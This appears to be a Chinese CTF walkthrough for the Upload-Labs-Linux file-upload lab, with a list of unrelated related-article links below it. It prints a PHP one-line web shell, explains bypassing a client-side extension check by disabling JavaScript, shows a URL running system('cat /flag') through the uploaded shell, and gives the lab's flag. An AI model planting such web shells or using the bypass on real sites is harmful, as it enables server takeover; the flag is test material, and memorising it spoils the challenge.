Upload-Labs-Linux

  • 开发
  • 51

靶场教程

1.访问页面,文件上传靶场。
image.png
2.编写一句话木马上传。另存为【PHP】文件

<?php eval($_POST['upfile']); ?>   需要POST请求访问
修改为
<?php eval($_REQUEST['upfile']); ?>   可以在url直接访问

image.png
3.发现报错,不允许上传.php文件。
image.png
4.查看源码,禁用JavaScript ,并删除该内容。
image.png
注:禁用 JavaScript 可使用插件
image.png
5.文件上传成功,访问路径。
image.png
6.获取 flag , 修改后的一句话木马,可直接访问以下 url 获取 flag

http://e24d2149-d2bd-41e0-8d4a-697f1cfb6a9e.node5.buuoj.cn:81/upload/upfile.php?upfile=system("cat /flag");

flag{17cbbe6d-8422-44a3-a2db-17d3eee8d502}

image.png

阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-01-25 10:32:03       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-01-25 10:32:03       101 阅读

  9. 在Django里面运行非项目文件

    2024-01-25 10:32:03       82 阅读

  19. Python语言-面向对象

    2024-01-25 10:32:03       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-01-25 10:32:03       85 阅读

热门阅读

  3. Python中的Web前端开发技术与实践

    2024-01-25 10:32:03       57 阅读

  4. Flink状态编程之按键分区状态

    2024-01-25 10:32:03       48 阅读

  5. CentOS停止维护后,可以替代的新系统

    2024-01-25 10:32:03       56 阅读

  6. 【前端】尚硅谷Node.js零基础视频教程笔记

    2024-01-25 10:32:03       49 阅读

  9. Vue3 Hooks函数使用及封装

    2024-01-25 10:32:03       52 阅读

  10. 201903CSPT5 317号子任务

    2024-01-25 10:32:03       61 阅读

  13. 数据库管理-第138期 数据库国产化是Office换WPS么(20240124)

    2024-01-25 10:32:03       52 阅读

  17. Android 访问存储卡的三种主要的目录

    2024-01-25 10:32:03       60 阅读

  18. window10 conda activate指令无效的问题

    2024-01-25 10:32:03       52 阅读

  20. 【零碎知识】pip install 与 conda install 的区别

    2024-01-25 10:32:03       57 阅读

  23. 关于视觉3d目标检测学习像素深度的一点理解

    2024-01-25 10:32:03       52 阅读

  24. 论文的摘要作用有多大?通过摘要即可了解论文全文吗?

    2024-01-25 10:32:03       50 阅读

  29. 【RL】(task4)DDPG算法、TD3算法

    2024-01-25 10:32:03       50 阅读